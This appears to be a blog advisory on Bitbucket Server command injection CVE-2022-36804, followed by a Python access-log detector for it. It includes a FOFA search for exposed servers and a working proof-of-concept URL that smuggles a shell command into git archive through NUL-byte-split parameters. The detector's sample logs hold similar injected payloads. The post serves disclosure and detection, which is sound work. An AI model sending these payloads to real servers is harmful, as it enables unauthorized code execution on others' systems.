Atlassian Bitbucket archive Remote Command Execution Vulnerability CVE-2022-36804
Vulnerability Description
Atlassian issued a security advisory disclosing a critical vulnerability in Bitbucket Server and Data Center that was introduced in version 7.0.0.
Bitbucket is Atlassian's web-based source-code hosting service for Git repositories (the hosted Bitbucket Cloud also supported Mercurial until 2020; Bitbucket Server and Data Center are Git-only).
The advisory describes a command injection vulnerability in multiple API endpoints of Bitbucket Server and Data Center. An attacker with access to a public repository, or with read permission on a private repository, can execute arbitrary code by sending a crafted HTTP request. In the archive endpoint used below, user-supplied query parameters are passed through as arguments to git archive; a NUL byte (%00) inside a parameter value terminates that argument, so the attacker can append extra git options such as --exec and --remote, and the --exec value is run through a shell. Versions 7.0.0 through 8.3.0 are affected; Atlassian fixed the issue in 7.6.17, 7.17.10, 7.21.4, 8.0.3, 8.1.3, 8.2.2 and 8.3.1. Setting feature.public.access=false blocks the unauthenticated path via public repositories, but any authenticated user with read permission on a repository can still exploit it, so it is a mitigation, not a fix.
Vulnerability Impact
Bitbucket Server and Data Center 7.0.0 through 8.3.0 (Bitbucket Cloud is not affected).
Asset discovery (FOFA search syntax)
app="ATLASSIAN-Bitbucket"
Vulnerability Reproduction
Login page
Verify the PoC
/rest/api/latest/projects/BIZEE/repos/bizee-communication-api/archive?filename=wN3Am&at=wN3Am&path=wN3Am&prefix=ax%00--exec=%60id%60%00--remote=origin
BIZEE and bizee-communication-api are the project key and repository slug of the target; replace them with a project and repository the requesting account can read (a public repository needs no login at all). The other values (wN3Am) are arbitrary filler. Decoded, the prefix parameter is ax<NUL>--exec=`id`<NUL>--remote=origin: the NUL bytes split it into three separate git arguments, --remote makes git archive fetch from the repository's local origin, and --exec=`id` is evaluated by the shell that git uses to launch the remote helper. The output of id typically shows up in the git error message that Bitbucket returns in the HTTP response, which confirms the target is vulnerable.
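The PoC above is easy to spot in web-server or reverse-proxy access logs once you know the shape: a request to the REST archive endpoint whose query parameters carry an encoded NUL byte followed by a git option. The following detector is an added example written for this post, not code from Atlassian or from the original author. It assumes Common Log Format access-log lines (the sample lines below are constructed for the example and are not from any real incident) and flags any archive-endpoint parameter that contains a NUL byte or an injected git option, in whichever parameter it appears, since the advisory covers more than the prefix parameter used in the PoC.

```python
"""Flag access-log requests that match CVE-2022-36804 argument injection
against the Bitbucket REST archive endpoint."""
from __future__ import annotations

import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample log lines for this example (not from a real incident).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Sep/2022:10:00:01 +0000] "GET /rest/api/latest/projects/PROJ/repos/app/archive?format=zip&at=main HTTP/1.1" 200 4821
10.0.0.9 - - [01/Sep/2022:10:00:07 +0000] "GET /rest/api/latest/projects/PROJ/repos/app/archive?filename=x&at=x&path=x&prefix=ax%00--exec=%60id%60%00--remote=origin HTTP/1.1" 500 312
10.0.0.9 - - [01/Sep/2022:10:00:09 +0000] "GET /projects/PROJ/repos/app/browse HTTP/1.1" 200 9000
10.0.0.12 - - [01/Sep/2022:10:01:00 +0000] "GET /rest/api/latest/projects/PROJ/repos/app/archive?prefix=%00--output=/tmp/x HTTP/1.1" 500 301
"""

# Common Log Format: ip ident user [timestamp] "METHOD target PROTO" status size
_LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# REST archive endpoint: /rest/api/{latest|1.0}/projects/{key}/repos/{slug}/archive
_ARCHIVE_RE = re.compile(
    r"^/rest/api/(?:latest|\d+\.\d+)/projects/[^/]+/repos/[^/]+/archive/?$"
)


def injected_args(value: str) -> list[str]:
    """Return the git-option-looking segments a NUL byte would split off.

    Bitbucket passes the parameter to git as one argument; a NUL byte inside
    it ends that argument early, so everything after the NUL that starts with
    '--' becomes an extra option to git archive.
    """
    if "\x00" not in value:
        return []
    return [seg for seg in value.split("\x00")[1:] if seg.startswith("--")]


def inspect_request(target: str) -> list[dict]:
    """Check one request target (path + query); one finding per bad parameter."""
    parts = urlsplit(target)
    if not _ARCHIVE_RE.match(parts.path):
        return []
    findings = []
    # parse_qsl percent-decodes values, so %00 becomes '\x00' and %60 a backtick.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if "\x00" in value or value.startswith("--"):
            findings.append({"param": name, "injected": injected_args(value) or [value]})
    return findings


def scan_access_log(text: str) -> list[dict]:
    """Scan CLF access-log text and return one hit per suspicious parameter."""
    hits = []
    for line in text.splitlines():
        m = _LOG_RE.match(line)
        if not m:
            continue  # not a CLF line; skip rather than guess
        ip, ts, _method, target, status = m.groups()
        for finding in inspect_request(target):
            hits.append(
                {"ip": ip, "ts": ts, "status": int(status),
                 "path": urlsplit(target).path, **finding}
            )
    return hits


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(f"{hit['ip']} {hit['ts']} {hit['param']}={hit['injected']} ({hit['status']})")
```

The check is deliberately independent of the HTTP status: a patched server rejects the request, an unpatched one usually answers 500 with the git error, and both are worth an alert because they show someone probing. Decoding before matching matters, too; a rule that greps for the literal string --exec would miss a double-encoded or mixed-case attempt, while a NUL byte has no legitimate place in any of these parameters.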
This post is licensed under CC BY 4.0 by the author.